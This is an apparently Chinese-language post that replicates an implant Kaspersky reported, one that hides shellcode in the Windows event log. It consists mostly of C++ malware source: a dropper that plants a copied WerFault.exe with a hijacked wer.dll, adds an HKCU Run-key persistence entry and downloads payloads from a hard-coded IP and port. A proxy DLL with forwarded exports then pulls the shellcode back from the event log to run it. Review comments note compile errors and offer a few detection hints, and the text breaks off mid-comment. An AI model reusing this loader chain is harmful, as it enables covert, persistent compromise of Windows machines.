• 对卡巴斯基发现的一个将shellcode写入eventlog的植入物的复现


    原文章:
    https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/

    EventShellcodeDropper
    核心功能:下载shellcode和wer.dll,将shellcode写入eventlog;同时把System32\WerFault.exe复制到C:\Windows\Tasks,并在同目录写入wer.dll(DLL搜索顺序劫持),再写入HKCU Run键实现持久化。(注:下面的代码中 url、result、pFileBytes 等标识符与其声明不一致,需修正后才能编译。)

    #include <windows.h>
    #include <iostream>
    #include <objbase.h>
    
    #import "C:\\Windows\\System32\\winhttpcom.dll" no_namespace
    #pragma comment(lib, "ole32.lib")
    #pragma comment(lib, "oleaut32.lib")
    
    // Interface ID {06f29373-5c5a-4b54-b025-6ef1bf8abf0e} handed to
    // CoCreateInstance in DownloadFile() to obtain IWinHttpRequest.
    // With the `#import ... no_namespace` above, __uuidof(IWinHttpRequest)
    // would presumably supply the same value; this hand-written copy must
    // match it exactly or CoCreateInstance fails with E_NOINTERFACE.
    const IID IID_IWinHttpRequest =
    {
      0x06f29373,
      0x5c5a,
      0x4b54,
      {0xb0, 0x25, 0x6e, 0xf1, 0xbf, 0x8a, 0xbf, 0x0e}
    };
    
    // Stores the downloaded payload in the Windows event log as the raw
    // binary data of ONE record: source "Key Management Service",
    // EVENTLOG_INFORMATION_TYPE, category 0x4142, event ID 9999, no
    // insertion strings. The companion wer.dll (ReadEvents) finds the
    // payload again by searching for event ID 9999.
    //
    // Detection hint: a record (presumably in the Application log) from
    // source "Key Management Service" with EventID 9999 / category 0x4142
    // whose payload is raw binary data rather than message strings.
    //
    // NOTE(review): hEventLog is not checked for NULL before ReportEventW.
    // NOTE(review): per the API docs a handle from RegisterEventSourceW is
    // released with DeregisterEventSource, not CloseEventLog.
    // NOTE(review): nothing here splits the payload, so `len` must stay
    // under the per-record size limit of the event log (verify the limit
    // for the target OS).
    BOOL WriteEvents(PBYTE pBuffer,DWORD len) {
    	HANDLE hEventLog;
    	hEventLog = RegisterEventSourceW(0,L"Key Management Service");
    	// Arguments: type, wCategory = 0x4142, dwEventID = 9999, no SID,
    	// 0 strings, dwDataSize = len, no string array, lpRawData = pBuffer.
    	if (!ReportEventW(hEventLog, EVENTLOG_INFORMATION_TYPE, 0x4142, 9999, 0, 0, len, 0, (LPVOID)pBuffer)) {
    		CloseEventLog(hEventLog);
    		return FALSE;
    	}
    	CloseEventLog(hEventLog);
    	return TRUE;
    }
    
    
    // Fetches chUrl with a synchronous WinHTTP GET (WinHttp.WinHttpRequest.5.1
    // via COM), copies the response body into `buffer` and reports its byte
    // length through dwLen. No status code is checked: whatever body the
    // server returns is treated as the payload.
    //
    // NOTE(review): as written this does not compile — `url` passed to
    // SysAllocString is undeclared; the parameter is `chUrl`.
    // NOTE(review): `buffer` carries no size. Both callers pass a 0x10000-byte
    // malloc block, so a response larger than 64 KiB overruns the heap in the
    // memcpy below.
    // NOTE(review): UpperBounds/LowerBounds are assigned only on the success
    // path, yet dwLen is computed from them unconditionally at the end — on
    // any failure the caller receives an indeterminate length.
    // NOTE(review): varResponse is never VariantClear'd (SAFEARRAY leak);
    // the CoInitialize HRESULT is overwritten before it is examined, and no
    // HRESULT reaches the caller (return type is VOID).
    // NOTE(review): callers use plain http:// — the payload is fetched in
    // the clear with no integrity check before it is stored and executed.
    VOID DownloadFile(const wchar_t* chUrl,DWORD& dwLen,PBYTE buffer) {
    
        long UpperBounds;
        long LowerBounds;
        unsigned char* buff;
        // Variable for return value.
        HRESULT    hr;
    
        // Initialize COM (result is not checked; hr is reassigned below).
        hr = CoInitialize(NULL);
    
        IWinHttpRequest* pIWinHttpRequest = NULL;
    
        VARIANT         varFalse;
        VARIANT         varEmpty;
        VARIANT            varResponse;
    
        VariantInit(&varResponse);
    
        CLSID           clsid;
    
        // VARIANT_FALSE -> Open() in synchronous mode.
        VariantInit(&varFalse);
        V_VT(&varFalse) = VT_BOOL;
        V_BOOL(&varFalse) = VARIANT_FALSE;
    
        // VT_ERROR variant = "no request body" for Send().
        VariantInit(&varEmpty);
        V_VT(&varEmpty) = VT_ERROR;
    
        hr = CLSIDFromProgID(L"WinHttp.WinHttpRequest.5.1", &clsid);
    
        if (SUCCEEDED(hr))
        {
            hr = CoCreateInstance(clsid, NULL,
                CLSCTX_INPROC_SERVER,
                IID_IWinHttpRequest,
                (void**)&pIWinHttpRequest);
        }
    
        // ==== Issue the GET and pull the body out of the response. =========
        if (SUCCEEDED(hr))
        {    // Open WinHttpRequest for synchronous access.
            BSTR bstrMethod = SysAllocString(L"GET");
            BSTR bstrUrl = SysAllocString(url);
            hr = pIWinHttpRequest->Open(bstrMethod, bstrUrl, varFalse);
            SysFreeString(bstrMethod);
            SysFreeString(bstrUrl);
        }
        if (SUCCEEDED(hr))
        {    // Send Request.
            hr = pIWinHttpRequest->Send(varEmpty);
        }
        if (SUCCEEDED(hr))
        {    // Get response body (a SAFEARRAY of bytes on success).
            hr = pIWinHttpRequest->get_ResponseBody(&varResponse);
        }
        if (SUCCEEDED(hr))
        {
            if (varResponse.vt == (VT_ARRAY | VT_UI1)) {
                long Dims = SafeArrayGetDim(varResponse.parray);
                // The array should only have 1 dimension.
                if (Dims == 1) {
                    // Get upper and lower array bounds.
                    SafeArrayGetLBound(varResponse.parray, 1,
                        &LowerBounds);
                    SafeArrayGetUBound(varResponse.parray, 1,
                        &UpperBounds);
                    // Upper bound is inclusive; +1 turns the difference into a count.
                    UpperBounds++;
                    // Lock SAFEARRAY for access.
                    SafeArrayAccessData(varResponse.parray,
                        (void**)&buff);
    
                    // Copy the downloaded body into the caller's buffer
                    // (unbounded: no size for `buffer` is known here).
                    memcpy(buffer, buff, (UpperBounds - LowerBounds));
    
                    SafeArrayUnaccessData(varResponse.parray);
                }
            }
        }
    
        // Report the downloaded length (indeterminate if any step above failed).
        dwLen = UpperBounds - LowerBounds;
    
        // Release memory.
        if (pIWinHttpRequest)
            pIWinHttpRequest->Release();
    
        CoUninitialize();
    
    }
    
    // Dropper entry point. Side effects, in order:
    //   1. copies the legitimate System32\WerFault.exe to C:\Windows\Tasks
    //      (bFailIfExists = 0, so an existing copy is overwritten);
    //   2. persistence: HKCU\Software\Microsoft\Windows\CurrentVersion\Run,
    //      value "Windows Problem Reporting" (REG_SZ) -> the copied exe;
    //   3. downloads the payload and stores it in the event log (WriteEvents);
    //   4. downloads the proxy wer.dll to C:\Windows\Tasks\wer.dll, next to
    //      the copied exe (so the copy resolves wer.dll from its own
    //      directory — a DLL search-order hijack, presumably; see the article);
    //   5. launches the copied WerFault.exe.
    // Artifacts 1, 2 and 4, the event-log record, and the hard-coded
    // plain-HTTP staging host:port are the observable indicators.
    //
    // NOTE(review): as written this does not compile — `result` in
    // RegOpenKeyW is undeclared (the variable is hResult) and pFileBytes is
    // declared inside the else-block but freed after it.
    // NOTE(review): no return value is checked (CopyFileW, RegOpenKeyW,
    // RegSetValueExW, WriteFile, ShellExecuteA); dwCodeSize/dwFileSize are
    // indeterminate if DownloadFile fails; both download buffers are 64 KiB
    // and DownloadFile does not bound its copy; the early `return -1` paths
    // leak pShellcodeBytes and leave artifacts 1 and 2 in place.
    int main() {
    	// Stage a copy of the signed WerFault.exe in a user-writable directory.
    	CopyFileW(L"C:\\Windows\\system32\\WerFault.exe", L"C:\\Windows\\Tasks\\WerFault.exe", 0);
    	// Persistence via the per-user Run key.
    	HKEY hResult;
    	RegOpenKeyW(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", &result);
    	// dwType 1 = REG_SZ; cbData 0x3c = 60 bytes = (29 chars + NUL) * sizeof(WCHAR),
    	// which matches the literal — a sizeof() would be less fragile.
    	RegSetValueExW(hResult, L"Windows Problem Reporting", 0, 1, (const BYTE*)L"C:\\Windows\\Tasks\\WerFault.exe", 0x3c);
    	RegCloseKey(hResult);
    
    	// Fetch the shellcode and write it into the event log.
        DWORD dwCodeSize;
        PBYTE pShellcodeBytes = (PBYTE)malloc(0x10000);
        
        DownloadFile(L"http://150.158.212.148:8888/test.bin", dwCodeSize, pShellcodeBytes);
    
    	if(!WriteEvents(pShellcodeBytes, dwCodeSize)) {
    		return -1;
    	}
    
    	// Create file.
        HANDLE hFile;
        DWORD  dwBytesWritten;
        hFile = CreateFile(TEXT("C:\\Windows\\Tasks\\wer.dll"),
            GENERIC_WRITE,              // Open for writing. 
            0,                          // Do not share. 
            NULL,                       // No security. 
            CREATE_ALWAYS,              // Overwrite existing.
            FILE_ATTRIBUTE_NORMAL,      // Normal file.
            NULL);                      // No attribute template.
    
        if (hFile == INVALID_HANDLE_VALUE)
        {
            return -1;
        }
        else
        {
            // Fetch the proxy DLL and drop it beside the copied WerFault.exe.
            DWORD dwFileSize;
            PBYTE pFileBytes = (PBYTE)malloc(0x10000);
            DownloadFile(L"http://150.158.212.148:8888/wer.dll", dwFileSize, pFileBytes);
            WriteFile(hFile, pFileBytes, dwFileSize, &dwBytesWritten, NULL);
        }
        
        CloseHandle(hFile);
    	free(pShellcodeBytes);
    	free(pFileBytes);
        // Launch the copied WerFault.exe, which is expected to load the planted wer.dll.
        ShellExecuteA(0, "open", "C:\\Windows\\Tasks\\WerFault.exe", 0, 0, 0);
    
    	return 0;
    }
    

    Wer.dll
    核心功能:作为wer.dll的代理DLL(下面的#pragma把全部导出转发到System32\wer.dll),在DllMain中patch宿主进程(WerFault.exe)的入口点,从eventlog读取并执行shellcode。与原版的hook方式不同:原版使用了BlackBone中的inline hook,我复现时未能成功(被注释掉的代码通过PBYTE指针写入16/64位立即数,只会写入最低1个字节,可能是原因之一),于是改用int 3断点+VEH异常处理进行hook。

    // dllmain.cpp : 定义 DLL 应用程序的入口点。
    #include "pch.h"
    
    #define _CRT_SECURE_NO_DEPRECATE
    #pragma warning (disable : 4996)
    #pragma comment(linker, "/export:WerSysprepCleanup=C:\\Windows\\System32\\wer.WerSysprepCleanup,@1")
    #pragma comment(linker, "/export:WerSysprepGeneralize=C:\\Windows\\System32\\wer.WerSysprepGeneralize,@2")
    #pragma comment(linker, "/export:WerUnattendedSetup=C:\\Windows\\System32\\wer.WerUnattendedSetup,@3")
    #pragma comment(linker, "/export:WerpAddAppCompatData=C:\\Windows\\System32\\wer.WerpAddAppCompatData,@4")
    #pragma comment(linker, "/export:WerpAddIfRegisteredForAppLocalDump=C:\\Windows\\System32\\wer.WerpAddIfRegisteredForAppLocalDump,@5")
    #pragma comment(linker, "/export:WerpAddMemoryBlock=C:\\Windows\\System32\\wer.WerpAddMemoryBlock,@6")
    #pragma comment(linker, "/export:WerpAddRegisteredDataToReport=C:\\Windows\\System32\\wer.WerpAddRegisteredDataToReport,@7")
    #pragma comment(linker, "/export:WerpAddRegisteredDumpsToReport=C:\\Windows\\System32\\wer.WerpAddRegisteredDumpsToReport,@8")
    #pragma comment(linker, "/export:WerpAddRegisteredMetadataToReport=C:\\Windows\\System32\\wer.WerpAddRegisteredMetadataToReport,@9")
    #pragma comment(linker, "/export:WerpArchiveReport=C:\\Windows\\System32\\wer.WerpArchiveReport,@10")
    #pragma comment(linker, "/export:WerpCancelUpload=C:\\Windows\\System32\\wer.WerpCancelUpload,@11")
    #pragma comment(linker, "/export:WerpCleanWer=C:\\Windows\\System32\\wer.WerpCleanWer,@12")
    #pragma comment(linker, "/export:WerpCloseStore=C:\\Windows\\System32\\wer.WerpCloseStore,@13")
    #pragma comment(linker, "/export:WerpCreateMachineStore=C:\\Windows\\System32\\wer.WerpCreateMachineStore,@14")
    #pragma comment(linker, "/export:WerpDeleteReport=C:\\Windows\\System32\\wer.WerpDeleteReport,@15")
    #pragma comment(linker, "/export:WerpDestroyWerString=C:\\Windows\\System32\\wer.WerpDestroyWerString,@16")
    #pragma comment(linker, "/export:WerpEnumerateStoreNext=C:\\Windows\\System32\\wer.WerpEnumerateStoreNext,@17")
    #pragma comment(linker, "/export:WerpEnumerateStoreStart=C:\\Windows\\System32\\wer.WerpEnumerateStoreStart,@18")
    #pragma comment(linker, "/export:WerpFlushImageCache=C:\\Windows\\System32\\wer.WerpFlushImageCache,@19")
    #pragma comment(linker, "/export:WerpForceDeferredCollection=C:\\Windows\\System32\\wer.WerpForceDeferredCollection,@20")
    #pragma comment(linker, "/export:WerpFreeUnmappedVaRanges=C:\\Windows\\System32\\wer.WerpFreeUnmappedVaRanges,@21")
    #pragma comment(linker, "/export:WerpGetBucketId=C:\\Windows\\System32\\wer.WerpGetBucketId,@22")
    #pragma comment(linker, "/export:WerpGetDynamicParameter=C:\\Windows\\System32\\wer.WerpGetDynamicParameter,@23")
    #pragma comment(linker, "/export:WerpGetEventType=C:\\Windows\\System32\\wer.WerpGetEventType,@24")
    #pragma comment(linker, "/export:WerpGetExtendedDiagData=C:\\Windows\\System32\\wer.WerpGetExtendedDiagData,@25")
    #pragma comment(linker, "/export:WerpGetFileByIndex=C:\\Windows\\System32\\wer.WerpGetFileByIndex,@26")
    #pragma comment(linker, "/export:WerpGetFilePathByIndex=C:\\Windows\\System32\\wer.WerpGetFilePathByIndex,@27")
    #pragma comment(linker, "/export:WerpGetLegacyBucketId=C:\\Windows\\System32\\wer.WerpGetLegacyBucketId,@28")
    #pragma comment(linker, "/export:WerpGetLoadedModuleByIndex=C:\\Windows\\System32\\wer.WerpGetLoadedModuleByIndex,@29")
    #pragma comment(linker, "/export:WerpGetNumFiles=C:\\Windows\\System32\\wer.WerpGetNumFiles,@30")
    #pragma comment(linker, "/export:WerpGetNumLoadedModules=C:\\Windows\\System32\\wer.WerpGetNumLoadedModules,@31")
    #pragma comment(linker, "/export:WerpGetNumSigParams=C:\\Windows\\System32\\wer.WerpGetNumSigParams,@32")
    #pragma comment(linker, "/export:WerpGetPathOfWERTempDirectory=C:\\Windows\\System32\\wer.WerpGetPathOfWERTempDirectory,@33")
    #pragma comment(linker, "/export:WerpGetReportCount=C:\\Windows\\System32\\wer.WerpGetReportCount,@34")
    #pragma comment(linker, "/export:WerpGetReportFinalConsent=C:\\Windows\\System32\\wer.WerpGetReportFinalConsent,@35")
    #pragma comment(linker, "/export:WerpGetReportFlags=C:\\Windows\\System32\\wer.WerpGetReportFlags,@36")
    #pragma comment(linker, "/export:WerpGetReportId=C:\\Windows\\System32\\wer.WerpGetReportId,@37")
    #pragma comment(linker, "/export:WerpGetReportInformation=C:\\Windows\\System32\\wer.WerpGetReportInformation,@38")
    #pragma comment(linker, "/export:WerpGetReportSettings=C:\\Windows\\System32\\wer.WerpGetReportSettings,@39")
    #pragma comment(linker, "/export:WerpGetReportTime=C:\\Windows\\System32\\wer.WerpGetReportTime,@40")
    #pragma comment(linker, "/export:WerpGetReportType=C:\\Windows\\System32\\wer.WerpGetReportType,@41")
    #pragma comment(linker, "/export:WerpGetResponseId=C:\\Windows\\System32\\wer.WerpGetResponseId,@42")
    #pragma comment(linker, "/export:WerpGetSigParamByIndex=C:\\Windows\\System32\\wer.WerpGetSigParamByIndex,@43")
    #pragma comment(linker, "/export:WerpGetStorePath=C:\\Windows\\System32\\wer.WerpGetStorePath,@44")
    #pragma comment(linker, "/export:WerpGetStoreType=C:\\Windows\\System32\\wer.WerpGetStoreType,@45")
    #pragma comment(linker, "/export:WerpGetTextFromReport=C:\\Windows\\System32\\wer.WerpGetTextFromReport,@46")
    #pragma comment(linker, "/export:WerpGetUIParamByIndex=C:\\Windows\\System32\\wer.WerpGetUIParamByIndex,@47")
    #pragma comment(linker, "/export:WerpGetUploadTime=C:\\Windows\\System32\\wer.WerpGetUploadTime,@48")
    #pragma comment(linker, "/export:WerpGetWerStringData=C:\\Windows\\System32\\wer.WerpGetWerStringData,@49")
    #pragma comment(linker, "/export:WerpGetWow64Process=C:\\Windows\\System32\\wer.WerpGetWow64Process,@50")
    #pragma comment(linker, "/export:WerpHashApplicationParameters=C:\\Windows\\System32\\wer.WerpHashApplicationParameters,@51")
    #pragma comment(linker, "/export:WerpInitializeImageCache=C:\\Windows\\System32\\wer.WerpInitializeImageCache,@52")
    #pragma comment(linker, "/export:WerpIsOnBattery=C:\\Windows\\System32\\wer.WerpIsOnBattery,@53")
    #pragma comment(linker, "/export:WerpIsTransportAvailable=C:\\Windows\\System32\\wer.WerpIsTransportAvailable,@54")
    #pragma comment(linker, "/export:WerpLoadReportFromBuffer=C:\\Windows\\System32\\wer.WerpLoadReportFromBuffer,@55")
    #pragma comment(linker, "/export:WerpOpenMachineArchive=C:\\Windows\\System32\\wer.WerpOpenMachineArchive,@56")
    #pragma comment(linker, "/export:WerpOpenMachineQueue=C:\\Windows\\System32\\wer.WerpOpenMachineQueue,@57")
    #pragma comment(linker, "/export:WerpPromptUser=C:\\Windows\\System32\\wer.WerpPromptUser,@58")
    #pragma comment(linker, "/export:WerpPruneStore=C:\\Windows\\System32\\wer.WerpPruneStore,@59")
    #pragma comment(linker, "/export:WerpReportCancel=C:\\Windows\\System32\\wer.WerpReportCancel,@60")
    #pragma comment(linker, "/export:WerpReportSetMaxProcessHoldMilliseconds=C:\\Windows\\System32\\wer.WerpReportSetMaxProcessHoldMilliseconds,@61")
    #pragma comment(linker, "/export:WerpReportSprintfParameter=C:\\Windows\\System32\\wer.WerpReportSprintfParameter,@62")
    #pragma comment(linker, "/export:WerpReserveMachineQueueReportDir=C:\\Windows\\System32\\wer.WerpReserveMachineQueueReportDir,@63")
    #pragma comment(linker, "/export:WerpResetTransientImageCacheStatistics=C:\\Windows\\System32\\wer.WerpResetTransientImageCacheStatistics,@64")
    #pragma comment(linker, "/export:WerpRestartApplication=C:\\Windows\\System32\\wer.WerpRestartApplication,@65")
    #pragma comment(linker, "/export:WerpSetDynamicParameter=C:\\Windows\\System32\\wer.WerpSetDynamicParameter,@66")
    #pragma comment(linker, "/export:WerpSetEventName=C:\\Windows\\System32\\wer.WerpSetEventName,@67")
    #pragma comment(linker, "/export:WerpSetProcessTimelines=C:\\Windows\\System32\\wer.WerpSetProcessTimelines,@68")
    #pragma comment(linker, "/export:WerpSetQuickDumpType=C:\\Windows\\System32\\wer.WerpSetQuickDumpType,@69")
    #pragma comment(linker, "/export:WerpSetReportApplicationIdentity=C:\\Windows\\System32\\wer.WerpSetReportApplicationIdentity,@70")
    #pragma comment(linker, "/export:WerpSetReportFlags=C:\\Windows\\System32\\wer.WerpSetReportFlags,@71")
    #pragma comment(linker, "/export:WerpSetReportInformation=C:\\Windows\\System32\\wer.WerpSetReportInformation,@72")
    #pragma comment(linker, "/export:WerpSetReportIsFatal=C:\\Windows\\System32\\wer.WerpSetReportIsFatal,@73")
    #pragma comment(linker, "/export:WerpSetReportNamespaceParameter=C:\\Windows\\System32\\wer.WerpSetReportNamespaceParameter,@74")
    #pragma comment(linker, "/export:WerpSetReportTime=C:\\Windows\\System32\\wer.WerpSetReportTime,@75")
    #pragma comment(linker, "/export:WerpSetReportUploadContextToken=C:\\Windows\\System32\\wer.WerpSetReportUploadContextToken,@76")
    #pragma comment(linker, "/export:WerpSetTelemetryAppParams=C:\\Windows\\System32\\wer.WerpSetTelemetryAppParams,@77")
    #pragma comment(linker, "/export:WerpSetTelemetryKernelParams=C:\\Windows\\System32\\wer.WerpSetTelemetryKernelParams,@78")
    #pragma comment(linker, "/export:WerpSetTelemetryServiceParams=C:\\Windows\\System32\\wer.WerpSetTelemetryServiceParams,@79")
    #pragma comment(linker, "/export:WerpShowUpsellUI=C:\\Windows\\System32\\wer.WerpShowUpsellUI,@80")
    #pragma comment(linker, "/export:WerpStitchedMinidumpVmPostReadCallback=C:\\Windows\\System32\\wer.WerpStitchedMinidumpVmPostReadCallback,@81")
    #pragma comment(linker, "/export:WerpStitchedMinidumpVmPreReadCallback=C:\\Windows\\System32\\wer.WerpStitchedMinidumpVmPreReadCallback,@82")
    #pragma comment(linker, "/export:WerpStitchedMinidumpVmQueryCallback=C:\\Windows\\System32\\wer.WerpStitchedMinidumpVmQueryCallback,@83")
    #pragma comment(linker, "/export:WerpSubmitReportFromStore=C:\\Windows\\System32\\wer.WerpSubmitReportFromStore,@84")
    #pragma comment(linker, "/export:WerpTraceAuxMemDumpStatistics=C:\\Windows\\System32\\wer.WerpTraceAuxMemDumpStatistics,@85")
    #pragma comment(linker, "/export:WerpTraceDuration=C:\\Windows\\System32\\wer.WerpTraceDuration,@86")
    #pragma comment(linker, "/export:WerpTraceImageCacheStatistics=C:\\Windows\\System32\\wer.WerpTraceImageCacheStatistics,@87")
    #pragma comment(linker, "/export:WerpTraceSnapshotStatistics=C:\\Windows\\System32\\wer.WerpTraceSnapshotStatistics,@88")
    #pragma comment(linker, "/export:WerpTraceStitchedDumpWriterStatistics=C:\\Windows\\System32\\wer.WerpTraceStitchedDumpWriterStatistics,@89")
    #pragma comment(linker, "/export:WerpTraceUnmappedVaRangesStatistics=C:\\Windows\\System32\\wer.WerpTraceUnmappedVaRangesStatistics,@90")
    #pragma comment(linker, "/export:WerpUnmapProcessViews=C:\\Windows\\System32\\wer.WerpUnmapProcessViews,@91")
    #pragma comment(linker, "/export:WerpValidateReportKey=C:\\Windows\\System32\\wer.WerpValidateReportKey,@92")
    #pragma comment(linker, "/export:WerpWalkGatherBlocks=C:\\Windows\\System32\\wer.WerpWalkGatherBlocks,@93")
    #pragma comment(linker, "/export:CloseThreadWaitChainSession=C:\\Windows\\System32\\wer.CloseThreadWaitChainSession,@94")
    #pragma comment(linker, "/export:GetThreadWaitChain=C:\\Windows\\System32\\wer.GetThreadWaitChain,@95")
    #pragma comment(linker, "/export:OpenThreadWaitChainSession=C:\\Windows\\System32\\wer.OpenThreadWaitChainSession,@96")
    #pragma comment(linker, "/export:RegisterWaitChainCOMCallback=C:\\Windows\\System32\\wer.RegisterWaitChainCOMCallback,@97")
    #pragma comment(linker, "/export:WerAddExcludedApplication=C:\\Windows\\System32\\wer.WerAddExcludedApplication,@98")
    #pragma comment(linker, "/export:WerFreeString=C:\\Windows\\System32\\wer.WerFreeString,@99")
    #pragma comment(linker, "/export:WerRemoveExcludedApplication=C:\\Windows\\System32\\wer.WerRemoveExcludedApplication,@100")
    #pragma comment(linker, "/export:WerReportAddDump=C:\\Windows\\System32\\wer.WerReportAddDump,@101")
    #pragma comment(linker, "/export:WerReportAddFile=C:\\Windows\\System32\\wer.WerReportAddFile,@102")
    #pragma comment(linker, "/export:WerReportCloseHandle=C:\\Windows\\System32\\wer.WerReportCloseHandle,@103")
    #pragma comment(linker, "/export:WerReportCreate=C:\\Windows\\System32\\wer.WerReportCreate,@104")
    #pragma comment(linker, "/export:WerReportSetParameter=C:\\Windows\\System32\\wer.WerReportSetParameter,@105")
    #pragma comment(linker, "/export:WerReportSetUIOption=C:\\Windows\\System32\\wer.WerReportSetUIOption,@106")
    #pragma comment(linker, "/export:WerReportSubmit=C:\\Windows\\System32\\wer.WerReportSubmit,@107")
    #pragma comment(linker, "/export:WerStoreClose=C:\\Windows\\System32\\wer.WerStoreClose,@108")
    #pragma comment(linker, "/export:WerStoreGetFirstReportKey=C:\\Windows\\System32\\wer.WerStoreGetFirstReportKey,@109")
    #pragma comment(linker, "/export:WerStoreGetNextReportKey=C:\\Windows\\System32\\wer.WerStoreGetNextReportKey,@110")
    #pragma comment(linker, "/export:WerStoreGetReportCount=C:\\Windows\\System32\\wer.WerStoreGetReportCount,@111")
    #pragma comment(linker, "/export:WerStoreGetSizeOnDisk=C:\\Windows\\System32\\wer.WerStoreGetSizeOnDisk,@112")
    #pragma comment(linker, "/export:WerStoreOpen=C:\\Windows\\System32\\wer.WerStoreOpen,@113")
    #pragma comment(linker, "/export:WerStorePurge=C:\\Windows\\System32\\wer.WerStorePurge,@114")
    #pragma comment(linker, "/export:WerStoreQueryReportMetadataV1=C:\\Windows\\System32\\wer.WerStoreQueryReportMetadataV1,@115")
    #pragma comment(linker, "/export:WerStoreQueryReportMetadataV2=C:\\Windows\\System32\\wer.WerStoreQueryReportMetadataV2,@116")
    #pragma comment(linker, "/export:WerStoreQueryReportMetadataV3=C:\\Windows\\System32\\wer.WerStoreQueryReportMetadataV3,@117")
    #pragma comment(linker, "/export:WerStoreUploadReport=C:\\Windows\\System32\\wer.WerStoreUploadReport,@118")
    #pragma comment(linker, "/export:WerpAddFile=C:\\Windows\\System32\\wer.WerpAddFile,@119")
    #pragma comment(linker, "/export:WerpAddFileBuffer=C:\\Windows\\System32\\wer.WerpAddFileBuffer,@120")
    #pragma comment(linker, "/export:WerpAddFileCallback=C:\\Windows\\System32\\wer.WerpAddFileCallback,@121")
    #pragma comment(linker, "/export:WerpAddTerminationReason=C:\\Windows\\System32\\wer.WerpAddTerminationReason,@122")
    #pragma comment(linker, "/export:WerpAuxmdDumpProcessImages=C:\\Windows\\System32\\wer.WerpAuxmdDumpProcessImages,@123")
    #pragma comment(linker, "/export:WerpAuxmdDumpRegisteredBlocks=C:\\Windows\\System32\\wer.WerpAuxmdDumpRegisteredBlocks,@124")
    #pragma comment(linker, "/export:WerpAuxmdFree=C:\\Windows\\System32\\wer.WerpAuxmdFree,@125")
    #pragma comment(linker, "/export:WerpAuxmdFreeCopyBuffer=C:\\Windows\\System32\\wer.WerpAuxmdFreeCopyBuffer,@126")
    #pragma comment(linker, "/export:WerpAuxmdHashVaRanges=C:\\Windows\\System32\\wer.WerpAuxmdHashVaRanges,@127")
    #pragma comment(linker, "/export:WerpAuxmdInitialize=C:\\Windows\\System32\\wer.WerpAuxmdInitialize,@128")
    #pragma comment(linker, "/export:WerpAuxmdMapFile=C:\\Windows\\System32\\wer.WerpAuxmdMapFile,@129")
    #pragma comment(linker, "/export:WerpCreateIntegratorReportId=C:\\Windows\\System32\\wer.WerpCreateIntegratorReportId,@130")
    #pragma comment(linker, "/export:WerpExtractReportFiles=C:\\Windows\\System32\\wer.WerpExtractReportFiles,@131")
    #pragma comment(linker, "/export:WerpFreeString=C:\\Windows\\System32\\wer.WerpFreeString,@132")
    #pragma comment(linker, "/export:WerpGetIntegratorReportId=C:\\Windows\\System32\\wer.WerpGetIntegratorReportId,@133")
    #pragma comment(linker, "/export:WerpGetReportConsent=C:\\Windows\\System32\\wer.WerpGetReportConsent,@134")
    #pragma comment(linker, "/export:WerpGetStoreLocation=C:\\Windows\\System32\\wer.WerpGetStoreLocation,@135")
    #pragma comment(linker, "/export:WerpIsDisabled=C:\\Windows\\System32\\wer.WerpIsDisabled,@136")
    #pragma comment(linker, "/export:WerpLoadReport=C:\\Windows\\System32\\wer.WerpLoadReport,@137")
    #pragma comment(linker, "/export:WerpSetAuxiliaryArchivePath=C:\\Windows\\System32\\wer.WerpSetAuxiliaryArchivePath,@138")
    #pragma comment(linker, "/export:WerpSetCallBack=C:\\Windows\\System32\\wer.WerpSetCallBack,@139")
    #pragma comment(linker, "/export:WerpSetDefaultUserConsent=C:\\Windows\\System32\\wer.WerpSetDefaultUserConsent,@140")
    #pragma comment(linker, "/export:WerpSetExitListeners=C:\\Windows\\System32\\wer.WerpSetExitListeners,@141")
    #pragma comment(linker, "/export:WerpSetIntegratorReportId=C:\\Windows\\System32\\wer.WerpSetIntegratorReportId,@142")
    #pragma comment(linker, "/export:WerpSetIptEnabled=C:\\Windows\\System32\\wer.WerpSetIptEnabled,@143")
    #pragma comment(linker, "/export:WerpSetReportOption=C:\\Windows\\System32\\wer.WerpSetReportOption,@144")
    #pragma comment(linker, "/export:WerpSetTtdStatus=C:\\Windows\\System32\\wer.WerpSetTtdStatus,@145")
    
    // Handle of the payload thread created in DllMain; VEH() blocks the
    // host's main thread on it until that thread exits.
    HANDLE hThreadHandle = NULL;
    
    // Reads the event log opened as "Key Management Service" (presumably the
    // Application log, where WriteEvents' records land) in batches that fill
    // pBuffer, looking for a record whose EventID is 9999 — the one the
    // dropper wrote — so the caller can take the payload from its
    // DataOffset/DataLength. Returns TRUE when such a record was seen.
    //
    // NOTE(review): as written this does not compile — `len` passed to
    // ReadEventLog is undeclared; the parameter is `dwLen`.
    // NOTE(review): `pBuffer = pBuffer + i` only moves the local copy of the
    // pointer; the caller's pointer is untouched, so the caller only sees the
    // right record when the match sits at offset 0 of the last batch read
    // (i == 0). Any other position hands the caller some other record header.
    // NOTE(review): the scan advances one byte at a time instead of by
    // EVENTLOGRECORD.Length, so the DWORD 9999 (0F 27 00 00) at any byte
    // offset — including inside another record's strings or data — counts as
    // a match, and ptr->EventID is read past dwReadlen near the end of the
    // batch. The record's source name is never checked.
    // NOTE(review): hEventLog is not checked for NULL.
    BOOL ReadEvents(PBYTE pBuffer,DWORD dwLen) {
    	HANDLE hEventLog;
    	DWORD dwReadlen;
    	DWORD dwnextlen;
    
    	hEventLog = OpenEventLogW(0, L"Key Management Service");
    
    	// Sequential forward read; the record-offset argument (1) is ignored
    	// for EVENTLOG_SEQUENTIAL_READ. Each call returns as many whole
    	// records as fit in the buffer.
    	while (ReadEventLog(hEventLog, EVENTLOG_FORWARDS_READ | EVENTLOG_SEQUENTIAL_READ, 1, (EVENTLOGRECORD*)pBuffer, len, &dwReadlen, &dwnextlen)) {
    		for (DWORD i = 0; i < dwReadlen; i++) {
    			EVENTLOGRECORD* ptr = (EVENTLOGRECORD*)(pBuffer + i);
    			if (ptr->EventID == 9999)
    			{
    				// Local pointer only — not visible to the caller.
    				pBuffer = pBuffer + i;
    				CloseEventLog(hEventLog);
    				return TRUE;
    			}
    		}
    	};
    
    	CloseEventLog(hEventLog);
    	return FALSE;
    }
    
    // Copies dwDataLength bytes from pData to pAddress (used to place the
    // payload into the executable heap) and verifies the copy with memcmp.
    // The return value is inverted relative to the BOOL convention: 0 when
    // the copy verified, 1 on mismatch. The only caller ignores it.
    //
    // NOTE(review): each iteration is a 64-bit InterlockedExchange64 at
    // pAddress + i, i.e. it stores 8 bytes (the data byte plus seven zero
    // bytes) per source byte at overlapping, unaligned addresses. The net
    // result is a correct byte copy, but the last iterations write up to
